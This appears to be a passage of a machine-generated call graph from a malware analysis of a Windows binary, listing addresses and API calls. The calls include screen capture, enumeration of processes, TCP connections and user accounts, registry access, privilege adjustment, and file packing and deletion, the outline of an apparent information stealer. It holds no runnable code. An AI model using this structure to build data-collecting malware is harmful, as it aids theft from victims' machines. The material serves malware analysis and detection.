2bb3ef6 PathAddBackslashA 82681->82682 82684 2bb3f40 82682->82684 82733 2bb4b00 CreateFileA 82684->82733 82688 2bb3fc0 82789 2bd54a0 GetDesktopWindow GetWindowDC 82688->82789 82690 2bb4015 82814 2bb72e0 CreateFileA 82690->82814 82696 2bb4046 PathAddBackslashA 82827 2bc39d0 EnterCriticalSection GetCurrentDirectoryA _snprintf SetCurrentDirectoryA 82696->82827 82698 2bb405c 82870 2bb79c0 82698->82870 82701 2bb388b 82700->82701 82702 2bb386e RegQueryValueExA 82700->82702 82703 2bb3899 82701->82703 82704 2bb3892 RegCloseKey 82701->82704 82702->82701 82703->82640 82705 2bb38a0 RegOpenKeyExA 82703->82705 82704->82703 82706 2bb38ca RegSetValueExA 82705->82706 82707 2bb38f0 82705->82707 82706->82707 82710 2bb38e6 RegFlushKey 82706->82710 82708 2bb38fe VirtualAlloc 82707->82708 82709 2bb38f7 RegCloseKey 82707->82709 82708->82640 82708->82649 82709->82708 82710->82707 82713 2bb3924 82711->82713 82712 2bb3a0a 82712->82652 82713->82712 82714 2bb3949 SymGetModuleBase 82713->82714 82715 2bb3973 SymGetModuleInfo 82714->82715 82716 2bb39f2 _snprintf 82714->82716 82715->82716 82717 2bb3986 SymGetSymFromAddr 82715->82717 82716->82712 82718 2bb39ce _snprintf 82717->82718 82719 2bb39a0 _snprintf 82717->82719 82718->82652 82719->82652 82720->82654 82721->82656 82722->82658 82724 2bb30d9 82723->82724 82725 2bb308f 82723->82725 82727 2bb7980 82724->82727 82875 2bb7680 82725->82875 82728 2bb3e3a PathAddBackslashA 82727->82728 82729 2bb7984 CreateDirectoryA 82727->82729 82728->82680 82729->82728 82730 2bb7991 GetLastError IsUserAnAdmin 82729->82730 82731 2bb79ab SetLastError 82730->82731 82732 2bb79a4 PathMakeSystemFolderA 82730->82732 82731->82728 82732->82731 82734 2bb3f9d PathAddBackslashA 82733->82734 82735 2bb4c48 82733->82735 82734->82688 82898 2bd59d0 82735->82898 82738 2bb4d80 82738->82738 82739 2bb4dd8 9 API calls 82738->82739 82740 2bb4d95 SetFilePointer LockFile WriteFile UnlockFile 82738->82740 82741 2bb4e76 82739->82741 82740->82739 82741->82741 82742 2bb4e8b SetFilePointer LockFile WriteFile UnlockFile 82741->82742 82743 2bb4ece 9 API calls 82741->82743 82742->82743 82744 2bb4f72 82743->82744 82744->82744 82745 2bb4fca 6 API calls 82744->82745 82746 2bb4f87 SetFilePointer LockFile WriteFile UnlockFile 82744->82746 82747 2bb5030 82745->82747 82746->82745 82747->82747 82748 2bb5085 SetFilePointer LockFile WriteFile UnlockFile 82747->82748 82749 2bb50d0 82748->82749 82749->82749 82750 2bb5128 13 API calls 82749->82750 82751 2bb50e5 SetFilePointer LockFile WriteFile UnlockFile 82749->82751 82752 2bb51f3 82750->82752 82751->82750 82752->82752 82753 2bb524b 9 API calls 82752->82753 82754 2bb5208 SetFilePointer LockFile WriteFile UnlockFile 82752->82754 82755 2bb52f8 82753->82755 82754->82753 82755->82755 82756 2bb530d SetFilePointer LockFile WriteFile UnlockFile 82755->82756 82757 2bb5350 9 API calls 82755->82757 82756->82757 82758 2bb5400 82757->82758 82758->82758 82759 2bb5458 10 API calls 82758->82759 82760 2bb5415 SetFilePointer LockFile WriteFile UnlockFile 82758->82760 82761 2bb5556 82759->82761 82760->82759 82761->82761 82762 2bb556b SetFilePointer LockFile WriteFile UnlockFile 82761->82762 82763 2bb55ae 8 API calls 82761->82763 82762->82763 82907 2bb4100 GetTickCount _snprintf 82763->82907 82765 2bb5637 82908 2bb4100 GetTickCount _snprintf 82765->82908 82767 2bb5651 82768 2bb56a5 9 API calls 82767->82768 82770 2bb5665 SetFilePointer LockFile WriteFile UnlockFile 82767->82770 82769 2bb5744 82768->82769 82769->82769 82771 2bb5759 SetFilePointer LockFile WriteFile UnlockFile 82769->82771 82772 2bb579c 9 API calls 82769->82772 82770->82768 82771->82772 82773 2bb582f IsUserAnAdmin 82772->82773 82775 2bb5854 82773->82775 82776 2bb58ae SetFilePointer LockFile WriteFile UnlockFile 82775->82776 82777 2bb586e SetFilePointer LockFile WriteFile UnlockFile 82775->82777 82909 2bb4900 RegOpenKeyExA 82776->82909 82777->82776 82781 2bb58f7 82954 2bb44d0 memset CreateToolhelp32Snapshot 82781->82954 82783 2bb58fd 82972 2bb4710 82783->82972 82785 2bb5903 82785->82734 82786 2bb590e GetHandleInformation 82785->82786 82786->82734 82787 2bb591d 82786->82787 82787->82734 82788 2bb5923 CloseHandle 82787->82788 82788->82734 82790 2bd55da 82789->82790 82791 2bd54c7 CreateCompatibleDC 82789->82791 82790->82690 82791->82790 82792 2bd54d8 7 API calls 82791->82792 82792->82790 82793 2bd5568 GetProcessHeap HeapAlloc 82792->82793 82793->82790 82794 2bd5582 memset GetDIBits 82793->82794 82993 2bc4170 82794->82993 82797 2bd55e5 GetDIBits 82800 2bb72e0 13 API calls 82797->82800 82798 2bd55d3 82799 2bc41b0 4 API calls 82798->82799 82799->82790 82801 2bd561d 82800->82801 82803 2bb7620 4 API calls 82801->82803 82813 2bd564e 82801->82813 82802 2bc41b0 4 API calls 82804 2bd565c 82802->82804 82805 2bd5632 82803->82805 82806 2bc41b0 4 API calls 82804->82806 82807 2bb7620 4 API calls 82805->82807 82808 2bd5664 ReleaseDC 82806->82808 82809 2bd563d 82807->82809 82808->82690 82810 2bb7620 4 API calls 82809->82810 82811 2bd5649 82810->82811 82812 2bb7310 2 API calls 82811->82812 82812->82813 82813->82802 82815 2bb4020 82814->82815 82816 2bb7301 82814->82816 82815->82670 82818 2bb7620 82815->82818 82817 2bd59d0 12 API calls 82816->82817 82817->82815 82819 2bb762e 82818->82819 82820 2bb4041 82818->82820 82819->82820 82821 2bb7632 SetFilePointer LockFile WriteFile UnlockFile 82819->82821 82822 2bb7310 82820->82822 82821->82820 82823 2bb733f 82822->82823 82824 2bb731f GetHandleInformation 82822->82824 82823->82696 82824->82823 82825 2bb732e 82824->82825 82825->82823 82826 2bb7334 CloseHandle 82825->82826 82826->82696 82828 2bc406f SetCurrentDirectoryA PathFileExistsA 82827->82828 82837 2bc3a39 82827->82837 82829 2bc408d SetFileAttributesA DeleteFileA 82828->82829 82830 2bc40a9 82828->82830 82829->82830 82831 2bc40db 82830->82831 82832 2bc40c1 GetProcessHeap HeapValidate 82830->82832 82834 2bc40fb LeaveCriticalSection 82831->82834 82835 2bc40e1 GetProcessHeap HeapValidate 82831->82835 82832->82831 82833 2bc40d0 GetProcessHeap HeapFree 82832->82833 82833->82831 82834->82698 82835->82834 82836 2bc40f0 GetProcessHeap HeapFree 82835->82836 82836->82834 82838 2bc3aa7 82837->82838 82839 2bc3a9c 82837->82839 82841 2bc3af3 PathAddBackslashA 82838->82841 82848 2bc3bd3 82838->82848 83058 2bb5d30 60 API calls 82839->83058 82842 2bc3b10 82841->82842 82842->82842 82843 2bc3b18 SHGetFolderPathA PathAddBackslashA 82842->82843 82846 2bc3b62 82843->82846 82844 2bc3c85 GetTickCount _snprintf VirtualAlloc 82844->82828 82845 2bc3cc9 lstrcpynA 82844->82845 82997 2bd9780 GetProcessHeap RtlAllocateHeap 82845->82997 82846->82846 82852 2bc3b7c CopyFileA 82846->82852 82848->82844 82850 2bc3c69 SetFileAttributesA DeleteFileA 82848->82850 82849 2bc3ce8 82851 2bc3cfd VirtualFree 82849->82851 83007 2bd9910 82849->83007 82850->82844 82854 2bb7680 26 API calls 82851->82854 82855 2bc3bb0 82852->82855 82858 2bc3d17 SetFileAttributesA RemoveDirectoryA 82854->82858 82855->82855 82856 2bc3bc3 PathAddBackslashA 82855->82856 82856->82848 83031 2bb78e0 82858->83031 82862 2bc3d62 GetProcessHeap HeapAlloc 82863 2bc3d7e memset 82862->82863 82864 2bc3d8a 82862->82864 82863->82864 82864->82828 82866 2bc3ffa Sleep 82864->82866 82867 2bc4007 82864->82867 83040 2bc3800 memset memset GetTempPathA GetTempFileNameA 82864->83040 82866->82864 82866->82867 82867->82828 82868 2bc406a 82867->82868 83059 2bb3500 6 API calls 82868->83059 82871 2bb79c6 SetFileAttributesA DeleteFileA 82870->82871 82872 2bb79d5 82870->82872 82871->82872 82872->82670 82873->82662 82874->82659 82876 2bb769a 82875->82876 82877 2bb78d7 82875->82877 82876->82877 82878 2bb76b2 GetProcessHeap HeapAlloc 82876->82878 82877->82724 82878->82877 82879 2bb76d6 memset lstrcpynA 82878->82879 82880 2bb76f2 82879->82880 82880->82880 82881 2bb76fa FindFirstFileA 82880->82881 82881->82877 82892 2bb7726 82881->82892 82882 2bb78a7 FindNextFileA 82883 2bb78bb FindClose 82882->82883 82882->82892 82894 2bc41b0 82883->82894 82886 2bb77d5 GetProcessHeap HeapAlloc 82886->82877 82887 2bb77f5 memset lstrcpynA PathAddBackslashA 82886->82887 82887->82892 82888 2bb7855 SetFileAttributesA SetFileAttributesA DeleteFileA 82889 2bb787a GetProcessHeap HeapValidate 82888->82889 82890 2bb7870 MoveFileExA 82888->82890 82889->82892 82893 2bb7890 GetProcessHeap HeapFree 82889->82893 82890->82889 82891 2bb7680 4 API calls 82891->82892 82892->82877 82892->82882 82892->82886 82892->82888 82892->82889 82892->82891 82893->82892 82895 2bb78c7 SetFileAttributesA RemoveDirectoryA 82894->82895 82896 2bc41b4 GetProcessHeap HeapValidate 82894->82896 82895->82877 82896->82895 82897 2bc41cb GetProcessHeap RtlFreeHeap 82896->82897 82897->82895 82985 2bd5930 GetCurrentThread OpenThreadToken 82898->82985 82901 2bb4c50 17 API calls 82901->82738 82902 2bd59e2 ConvertStringSecurityDescriptorToSecurityDescriptorW 82902->82901 82903 2bd59f8 GetSecurityDescriptorSacl 82902->82903 82904 2bd5a15 SetNamedSecurityInfoA 82903->82904 82905 2bd5a33 LocalFree 82903->82905 82904->82905 82906 2bd5a30 82904->82906 82905->82901 82906->82905 82907->82765 82908->82767 82910 2bb4933 _snprintf 82909->82910 82911 2bb4af2 82909->82911 82912 2bb4ae8 RegCloseKey 82910->82912 82917 2bb495e 82910->82917 82920 2bb4180 GetProcessHeap HeapAlloc 82911->82920 82912->82911 82913 2bb4966 RegQueryValueExA 82914 2bb4ae6 82913->82914 82913->82917 82914->82912 82915 2bb499a SetFilePointer LockFile WriteFile UnlockFile 82916 2bb49dd SetFilePointer LockFile WriteFile UnlockFile 82915->82916 82916->82917 82917->82913 82917->82915 82917->82916 82917->82917 82918 2bb4a7a SetFilePointer LockFile WriteFile UnlockFile _snprintf 82917->82918 82919 2bb4a3c SetFilePointer LockFile WriteFile UnlockFile 82917->82919 82918->82913 82918->82914 82919->82918 82921 2bb41bc 82920->82921 82922 2bb41ac memset 82920->82922 82923 2bb421d GetTcpTable 82921->82923 82924 2bb44c5 82921->82924 82922->82921 82925 2bb422f GetProcessHeap HeapValidate 82923->82925 82926 2bb4290 82923->82926 82924->82781 82927 2bb424b 82925->82927 82928 2bb423f GetProcessHeap HeapFree 82925->82928 82929 2bb42bd 82926->82929 82930 2bb4294 GetProcessHeap HeapValidate 82926->82930 82931 2bb4278 82927->82931 82932 2bb4254 GetProcessHeap HeapAlloc 82927->82932 82928->82927 82934 2bb42d1 GetProcessHeap HeapAlloc 82929->82934 82935 2bb4370 82929->82935 82930->82924 82933 2bb42a8 GetProcessHeap HeapFree 82930->82933 82931->82924 82937 2bb4283 GetTcpTable 82931->82937 82932->82931 82936 2bb426c memset 82932->82936 82933->82781 82934->82935 82939 2bb42f0 memset 82934->82939 82938 2bc41b0 4 API calls 82935->82938 82936->82931 82937->82926 82941 2bb4377 82938->82941 82940 2bb4305 82939->82940 82940->82940 82942 2bb431f 82940->82942 82944 2bb442a 82940->82944 82941->82781 82943 2bb4090 GetProcessHeap HeapAlloc _snprintf 82942->82943 82942->82944 82948 2bb4344 GetProcessHeap HeapValidate 82942->82948 82950 2bb438c htons htons _snprintf GetProcessHeap HeapValidate 82942->82950 82943->82942 82944->82944 82945 2bb44a3 GetProcessHeap HeapValidate 82944->82945 82946 2bb4464 SetFilePointer LockFile WriteFile UnlockFile 82944->82946 82945->82924 82947 2bb44b9 GetProcessHeap HeapFree 82945->82947 82946->82945 82947->82924 82948->82942 82949 2bb435b GetProcessHeap HeapFree 82948->82949 82949->82942 82951 2bb43f3 GetProcessHeap HeapValidate 82950->82951 82952 2bb43e7 GetProcessHeap HeapFree 82950->82952 82951->82942 82953 2bb4406 GetProcessHeap HeapFree 82951->82953 82952->82951 82953->82942 82955 2bb4523 Process32First 82954->82955 82956 2bb46e6 82954->82956 82957 2bb453b 82955->82957 82958 2bb4576 82955->82958 82956->82783 82957->82956 82959 2bb4547 GetHandleInformation 82957->82959 82958->82956 82962 2bb4597 GetProcessHeap HeapAlloc 82958->82962 82959->82956 82960 2bb455b 82959->82960 82960->82956 82961 2bb4566 CloseHandle 82960->82961 82961->82783 82962->82956 82963 2bb45b7 memset 82962->82963 82967 2bb45d0 82963->82967 82964 2bb45e0 OpenProcess 82965 2bb45f6 GetModuleFileNameExA 82964->82965 82964->82967 82965->82967 82966 2bb4657 _snprintf Process32Next 82966->82964 82968 2bb4689 82966->82968 82967->82964 82967->82966 82968->82968 82969 2bb7620 4 API calls 82968->82969 82970 2bb46c4 GetProcessHeap HeapValidate 82969->82970 82970->82956 82971 2bb46da GetProcessHeap HeapFree 82970->82971 82971->82956 82973 2bb4741 82972->82973 82977 2bb48e0 82972->82977 82974 2bb4743 NetQueryDisplayInformation 82973->82974 82975 2bb4857 82973->82975 82976 2bb4799 GetProcessHeap HeapAlloc 82973->82976 82979 2bb48e9 NetApiBufferFree 82973->82979 82983 2bb47fc _snprintf 82973->82983 82984 2bb482a NetApiBufferFree 82973->82984 82974->82973 82975->82977 82980 2bb487a SetFilePointer LockFile WriteFile UnlockFile 82975->82980 82981 2bb48be GetProcessHeap HeapValidate 82975->82981 82976->82973 82978 2bb47b8 memset 82976->82978 82977->82785 82978->82973 82979->82785 82980->82981 82981->82977 82982 2bb48d4 GetProcessHeap HeapFree 82981->82982 82982->82977 82983->82973 82984->82974 82984->82975 82986 2bd5968 LookupPrivilegeValueA 82985->82986 82987 2bd5951 GetCurrentProcess OpenProcessToken 82985->82987 82989 2bd598b AdjustTokenPrivileges 82986->82989 82990 2bd59b2 CloseHandle 82986->82990 82987->82986 82988 2bd59bc 82987->82988 82988->82901 82988->82902 82989->82990 82991 2bd59a5 GetLastError 82989->82991 82990->82988 82991->82990 82992 2bd59af 82991->82992 82992->82990 82994 2bc4176 GetProcessHeap RtlAllocateHeap 82993->82994 82996 2bc41a2 82993->82996 82995 2bc4194 memset 82994->82995 82994->82996 82995->82996 82996->82797 82996->82798 82998 2bd97a4 memset 82997->82998 82999 2bd97cf 82997->82999 82998->82999 83000 2bd9815 82999->83000 83006 2bd97ee CreateFileA 82999->83006 83001 2bd9846 GetProcessHeap HeapAlloc 83000->83001 83002 2bd9823 GetProcessHeap HeapValidate 83000->83002 83005 2bd9857 83001->83005 83003 2bd983d 83002->83003 83004 2bd9832 GetProcessHeap HeapFree 83002->83004 83003->82849 83004->83003 83005->82849 83006->83000 83009 2bd992b 83007->83009 83008 2bc3cf7 83020 2bd9880 83008->83020 83009->83008 83009->83009 83010 2bd9987 LocalAlloc 83009->83010 83010->83008 83011 2bd99a1 _snprintf FindFirstFileA LocalFree 83010->83011 83012 2bd9b1b FindClose 83011->83012 83019 2bd99d7 83011->83019 83012->83008 83013 2bd9b07 FindNextFileA 83013->83012 83013->83019 83014 2bd99f6 wsprintfA wsprintfA 83014->83019 83015 2bd9aa7 memset lstrcpynA 83060 2bd9160 83015->83060 83016 2bd9910 76 API calls 83016->83019 83018 2bd9160 76 API calls 83018->83019 83019->83013 83019->83014 83019->83015 83019->83016 83019->83018 83021 2bd988b 83020->83021 83022 2bd989a 83020->83022 83021->82851 83023 2bd989f 83022->83023 83332 2bd8c10 83022->83332 83023->82851 83025 2bd98b8 83026 2bd98c7 GetProcessHeap HeapValidate 83025->83026 83027 2bd98e3 GetProcessHeap HeapValidate 83025->83027 83026->83027 83028 2bd98d7 GetProcessHeap HeapFree 83026->83028 83029 2bd98ff 83027->83029 83030 2bd98f3 GetProcessHeap HeapFree 83027->83030 83028->83027 83029->82851 83030->83029 83501 2bb74a0 83031->83501 83034 2bb796e 83034->82828 83034->82862 83034->82864 83035 2bb794c GetProcessHeap HeapValidate 83035->83034 83036 2bb7962 GetProcessHeap HeapFree 83035->83036 83036->83034 83037 2bb793b 83037->83035 83038 2bb7913 GetProcessHeap RtlAllocateHeap 83038->83037 83039 2bb792f memset 83038->83039 83039->83037 83518 2bb6c70 memset memset RegOpenKeyExA 83040->83518 83042 2bc3877 83043 2bc38db 83042->83043 83048 2bc38b9 GetProcessHeap HeapValidate 83042->83048 83530 2bc4ab0 memset 83043->83530 83045 2bc3904 83046 2bc4ab0 84 API calls 83045->83046 83049 2bc3927 83045->83049 83046->83049 83047 2bb74a0 16 API calls 83050 2bc393f 83047->83050 83048->83043 83051 2bc38cc GetProcessHeap HeapFree 83048->83051 83049->83047 83052 2bc39bc 83049->83052 83050->83052 83053 2bc3945 SetFileAttributesA DeleteFileA 83050->83053 83051->83043 83052->82864 83054 2bc3966 83053->83054 83055 2bc3990 GetProcessHeap HeapValidate 83053->83055 83054->83055 83056 2bc39a5 GetProcessHeap HeapFree 83055->83056 83057 2bc39b0 83055->83057 83056->83057 83057->82864 83058->82838 83059->82828 83061 2bd9184 83060->83061 83062 2bd9176 83060->83062 83063 2bd9198 lstrcpynA 83061->83063 83064 2bd918a 83061->83064 83062->83019 83065 2bd91bb 83063->83065 83086 2bd923b 83063->83086 83064->83019 83066 2bd9219 83065->83066 83067 2bd9225 83065->83067 83112 2bd8cb0 83066->83112 83069 2bd922a 83067->83069 83070 2bd9236 83067->83070 83210 2bd8d50 83069->83210 83073 2bd926a 83070->83073 83070->83086 83071 2bd9223 83075 2bd9275 lstrcpynA lstrcpynA 83071->83075 83071->83086 83219 2bd8e30 GetLocalTime SystemTimeToFileTime FileTimeToDosDateTime 83073->83219 83077 2bd92b0 83075->83077 83076 2bd92e9 lstrcpynA 83078 2bd935b 83076->83078 83077->83076 83077->83077 83123 2bd7df0 83078->83123 83081 2bd945e 83084 2bd9489 83081->83084 83085 2bd9478 83081->83085 83082 2bd944b 83083 2bd8f70 2 API calls 83082->83083 83083->83086 83089 2bd9497 83084->83089 83092 2bd94a8 83084->83092 83094 2bd94a4 83084->83094 83087 2bd8f70 2 API calls 83085->83087 83086->83019 83088 2bd947d 83087->83088 83088->83019 83188 2bd8ff0 GetProcessHeap RtlAllocateHeap 83089->83188 83092->83094 83220 2bd90f0 10 API calls 83092->83220 83199 2bd8f70 83094->83199 83096 2bd94ff 83205 2bd8bc0 83096->83205 83097 2bd9570 83098 2bd957c 83097->83098 83221 2bd8090 8 API calls 83097->83221 83098->83019 83101 2bd953d 83101->83086 83102 2bd7df0 8 API calls 83101->83102 83103 2bd954c 83102->83103 83103->83086 83105 2bd8bc0 SetFilePointer 83103->83105 83104 2bd95c2 83106 2bd95d1 memcpy GetProcessHeap HeapAlloc 83104->83106 83222 2bc4270 GetProcessHeap HeapAlloc memset 83104->83222 83107 2bd955e 83105->83107 83110 2bd9611 memset 83106->83110 83111 2bd9621 83106->83111 83107->83086 83107->83104 83110->83111 83111->83019 83111->83111 83113 2bd8cd6 83112->83113 83114 2bd8ce2 CreateFileA 83112->83114 83113->83071 83115 2bd8cfc 83114->83115 83116 2bd8d08 83114->83116 83115->83071 83117 2bd8d50 19 API calls 83116->83117 83118 2bd8d0d 83117->83118 83119 2bd8d37 83118->83119 83120 2bd8d1b GetHandleInformation 83118->83120 83119->83071 83120->83119 83121 2bd8d2a 83120->83121 83121->83119 83122 2bd8d30 CloseHandle 83121->83122 83122->83119 83223 2bd8ab0 83123->83223 83125 2bd7e05 83126 2bd8ab0 8 API calls 83125->83126 83127 2bd7e16 83126->83127 83128 2bd8ab0 8 API calls 83127->83128 83129 2bd7e27 83128->83129 83130 2bd8ab0 8 API calls 83129->83130 83131 2bd7e38 83130->83131 83132 2bd8ab0 8 API calls 83131->83132 83133 2bd7e4c 83132->83133 83134 2bd8ab0 8 API calls 83133->83134 83135 2bd7e60 83134->83135 83136 2bd8ab0 8 API calls 83135->83136 83137 2bd7e74 83136->83137 83138 2bd8ab0 8 API calls 83137->83138 83139 2bd7e88 83138->83139 83140 2bd8ab0 8 API calls 83139->83140 83141 2bd7e9c 83140->83141 83142 2bd8ab0 8 API calls 83141->83142 83143 2bd7eb0 83142->83143 83144 2bd8ab0 8 API calls 83143->83144 83145 2bd7ec4 83144->83145 83146 2bd8ab0 8 API calls 83145->83146 83147 2bd7ed8 83146->83147 83148 2bd8ab0 8 API calls 83147->83148 83149 2bd7eec 83148->83149 83150 2bd8ab0 8 API calls 83149->83150 83151 2bd7f00 83150->83151 83152 2bd8ab0 8 API calls 83151->83152 83153 2bd7f14 83152->83153 83154 2bd8ab0 8 API calls 83153->83154 83155 2bd7f28 83154->83155 83156 2bd8ab0 8 API calls 83155->83156 83157 2bd7f3c 83156->83157 83158 2bd8ab0 8 API calls 83157->83158 83159 2bd7f50 83158->83159 83160 2bd8ab0 8 API calls 83159->83160 83161 2bd7f64 83160->83161 83162 2bd8ab0 8 API calls 83161->83162 83163 2bd7f78 83162->83163 83164 2bd8ab0 8 API calls 83163->83164 83165 2bd7f8c 83164->83165 83166 2bd8ab0 8 API calls 83165->83166 83167 2bd7fa0 83166->83167 83168 2bd8ab0 8 API calls 83167->83168 83169 2bd7fb4 83168->83169 83170 2bd8ab0 8 API calls 83169->83170 83171 2bd7fc8 83170->83171 83172 2bd8ab0 8 API calls 83171->83172 83173 2bd7fdc 83172->83173 83174 2bd8ab0 8 API calls 83173->83174 83175 2bd7ff0 83174->83175 83176 2bd8ab0 8 API calls 83175->83176 83177 2bd8004 83176->83177 83178 2bd8ab0 8 API calls 83177->83178 83179 2bd801a 83178->83179 83180 2bd8ab0 8 API calls 83179->83180 83181 2bd802e 83180->83181 83182 2bd8ab0 8 API calls 83181->83182 83183 2bd8044 83182->83183 83184 2bd805a 83183->83184 83185 2bd8ab0 8 API calls 83183->83185 83186 2bd805f 83184->83186 83187 2bd8ab0 8 API calls 83184->83187 83185->83184 83186->83081 83186->83082 83187->83186 83189 2bd9018 memset 83188->83189 83191 2bd902c 83188->83191 83256 2bd5e80 17 API calls 83189->83256 83238 2bd7490 83191->83238 83195 2bd90b4 GetProcessHeap HeapValidate 83197 2bd90db GetProcessHeap RtlFreeHeap 83195->83197 83198 2bd90e6 83195->83198 83197->83198 83198->83094 83200 2bd8f7a 83199->83200 83201 2bd8fa5 83199->83201 83200->83201 83202 2bd8f82 GetHandleInformation 83200->83202 83201->83086 83201->83096 83201->83097 83202->83201 83203 2bd8f98 83202->83203 83203->83201 83204 2bd8f9e CloseHandle 83203->83204 83204->83201 83206 2bd8bc6 83205->83206 83207 2bd8bd0 83205->83207 83206->83101 83208 2bd8bd6 83207->83208 83209 2bd8bf1 SetFilePointer 83207->83209 83208->83101 83209->83101 83211 2bd8e1f 83210->83211 83212 2bd8d79 83210->83212 83211->83071 83212->83211 83213 2bd8d82 GetFileType 83212->83213 83214 2bd8d8e 83213->83214 83215 2bd8dc0 GetLocalTime SystemTimeToFileTime FileTimeToDosDateTime 83213->83215 83318 2bd8890 GetFileType 83214->83318 83215->83071 83217 2bd8da3 83217->83211 83218 2bd8da7 SetFilePointer 83217->83218 83218->83071 83219->83071 83220->83094 83221->83107 83222->83106 83224 2bd8b84 83223->83224 83225 2bd8ac3 83223->83225 83226 2bd8b8a WriteFile 83224->83226 83227 2bd8bb0 83224->83227 83228 2bd8b62 memcpy 83225->83228 83229 2bd8adf CreateFileMappingA 83225->83229 83226->83125 83227->83125 83228->83125 83231 2bd8b1f 83229->83231 83232 2bd8b03 MapViewOfFile 83229->83232 83231->83125 83233 2bd8b2d memcpy UnmapViewOfFile 83232->83233 83234 2bd8b1a 83232->83234 83236 2bb7310 2 API calls 83233->83236 83235 2bb7310 2 API calls 83234->83235 83235->83231 83237 2bd8b50 83236->83237 83237->83228 83239 2bd74a2 memset 83238->83239 83241 2bd7528 83239->83241 83245 2bd8eb0 2 API calls 83241->83245 83242 2bd757c 83246 2bd7b00 83242->83246 83243 2bd755b 83243->83242 83257 2bd7770 memcpy memcpy ReadFile 83243->83257 83245->83243 83247 2bd7b23 83246->83247 83254 2bd7b2e 83246->83254 83278 2bd78b0 12 API calls 83247->83278 83249 2bd7d9f 83258 2bd6c00 83249->83258 83250 2bd7b28 83250->83195 83254->83249 83255 2bd6c00 9 API calls 83254->83255 83279 2bd7770 memcpy memcpy ReadFile 83254->83279 83255->83254 83256->83191 83257->83242 83259 2bd6c2d 83258->83259 83260 2bd6cc0 83259->83260 83261 2bd6c87 83259->83261 83262 2bd6cc6 83260->83262 83263 2bd6d01 83260->83263 83264 2bd71a0 8 API calls 83261->83264 83265 2bd71a0 8 API calls 83262->83265 83280 2bd71a0 83263->83280 83267 2bd6c8f 83264->83267 83268 2bd6ccf 83265->83268 83308 2bd7350 9 API calls 83267->83308 83271 2bd6fb0 8 API calls 83268->83271 83275 2bd6cbb 83271->83275 83276 2bd6d8c 83275->83276 83304 2bd7260 83275->83304 83276->83195 83278->83250 83279->83254 83281 2bd71af 83280->83281 83282 2bd6d0a 83281->83282 83309 2bd8a80 83281->83309 83284 2bd6b30 83282->83284 83285 2bd6b47 83284->83285 83286 2bd71a0 8 API calls 83285->83286 83287 2bd6b83 83286->83287 83288 2bd71a0 8 API calls 83287->83288 83289 2bd6b91 83288->83289 83290 2bd71a0 8 API calls 83289->83290 83295 2bd6b9c 83290->83295 83291 2bd6bcc 83314 2bd6900 83291->83314 83293 2bd71a0 8 API calls 83293->83295 83295->83291 83295->83293 83296 2bd6900 8 API calls 83297 2bd6bee 83296->83297 83298 2bd6fb0 83297->83298 83299 2bd6fce 83298->83299 83302 2bd70c9 83298->83302 83299->83302 83303 2bd71a0 8 API calls 83299->83303 83300 2bd71a0 8 API calls 83301 2bd70e2 83300->83301 83301->83275 83302->83300 83303->83299 83305 2bd726c 83304->83305 83306 2bd7323 83305->83306 83307 2bd8a80 8 API calls 83305->83307 83306->83276 83307->83306 83308->83275 83310 2bd8a8d 83309->83310 83311 2bd8a92 83309->83311 83310->83282 83312 2bd8ab0 8 API calls 83311->83312 83313 2bd8a9f 83312->83313 83313->83282 83316 2bd6925 83314->83316 83315 2bd6a55 83315->83296 83316->83315 83317 2bd71a0 8 API calls 83316->83317 83317->83316 83319 2bd88a4 83318->83319 83320 2bd88b1 GetFileInformationByHandle 83318->83320 83319->83217 83321 2bd88cd GetSystemTime GetLocalTime SystemTimeToFileTime SystemTimeToFileTime 83320->83321 83322 2bd88c0 83320->83322 83323 2bd8925 GetFileSize 83321->83323 83322->83217 83325 2bd898e SetFilePointer ReadFile SetFilePointer ReadFile 83323->83325 83328 2bd8a1d 83323->83328 83326 2bd89d5 83325->83326 83325->83328 83327 2bd89e0 SetFilePointer ReadFile 83326->83327 83326->83328 83329 2bd8a01 83327->83329 83330 2bd8a4d FileTimeToDosDateTime 83328->83330 83331 2bd8a6e 83328->83331 83329->83328 83330->83331 83331->83217 83333 2bd8c1d 83332->83333 83334 2bd8c23 83332->83334 83347 2bd9680 83333->83347 83336 2bd8c3d 83334->83336 83339 2bd8c36 UnmapViewOfFile 83334->83339 83337 2bd8c6e 83336->83337 83338 2bd8c4b GetHandleInformation 83336->83338 83341 2bd8c79 GetHandleInformation 83337->83341 83342 2bd8ca6 83337->83342 83338->83337 83340 2bd8c61 83338->83340 83339->83336 83340->83337 83343 2bd8c67 CloseHandle 83340->83343 83344 2bd8c98 83341->83344 83345 2bd8c8b 83341->83345 83342->83025 83343->83337 83344->83025 83345->83344 83346 2bd8c91 CloseHandle 83345->83346 83346->83344 83354 2bd96a8 83347->83354 83355 2bd9734 83347->83355 83348 2bd9707 GetProcessHeap HeapValidate 83353 2bd971d GetProcessHeap HeapFree 83348->83353 83348->83354 83349 2bd96e3 GetProcessHeap HeapValidate 83349->83348 83352 2bd96f7 GetProcessHeap HeapFree 83349->83352 83352->83348 83353->83354 83354->83348 83354->83349 83354->83355 83357 2bd81d0 83354->83357 83356 2bd9754 83355->83356 83456 2bd85d0 83355->83456 83356->83334 83358 2bd8ab0 8 API calls 83357->83358 83359 2bd81e5 83358->83359 83360 2bd8ab0 8 API calls 83359->83360 83361 2bd81f6 83360->83361 83362 2bd8ab0 8 API calls 83361->83362 83363 2bd8207 83362->83363 83364 2bd8ab0 8 API calls 83363->83364 83365 2bd8218 83364->83365 83366 2bd8ab0 8 API calls 83365->83366 83367 2bd822b 83366->83367 83368 2bd8ab0 8 API calls 83367->83368 83369 2bd823f 83368->83369 83370 2bd8ab0 8 API calls 83369->83370 83371 2bd8253 83370->83371 83372 2bd8ab0 8 API calls 83371->83372 83373 2bd8267 83372->83373 83374 2bd8ab0 8 API calls 83373->83374 83375 2bd827b 83374->83375 83376 2bd8ab0 8 API calls 83375->83376 83377 2bd828f 83376->83377 83378 2bd8ab0 8 API calls 83377->83378 83379 2bd82a3 83378->83379 83380 2bd8ab0 8 API calls 83379->83380 83381 2bd82b7 83380->83381 83382 2bd8ab0 8 API calls 83381->83382 83383 2bd82cb 83382->83383 83384 2bd8ab0 8 API calls 83383->83384 83385 2bd82df 83384->83385 83386 2bd8ab0 8 API calls 83385->83386 83387 2bd82f3 83386->83387 83388 2bd8ab0 8 API calls 83387->83388 83389 2bd8307 83388->83389 83390 2bd8ab0 8 API calls 83389->83390 83391 2bd831b 83390->83391 83392 2bd8ab0 8 API calls 83391->83392 83393 2bd832f 83392->83393 83394 2bd8ab0 8 API calls 83393->83394 83395 2bd8343 83394->83395 83396 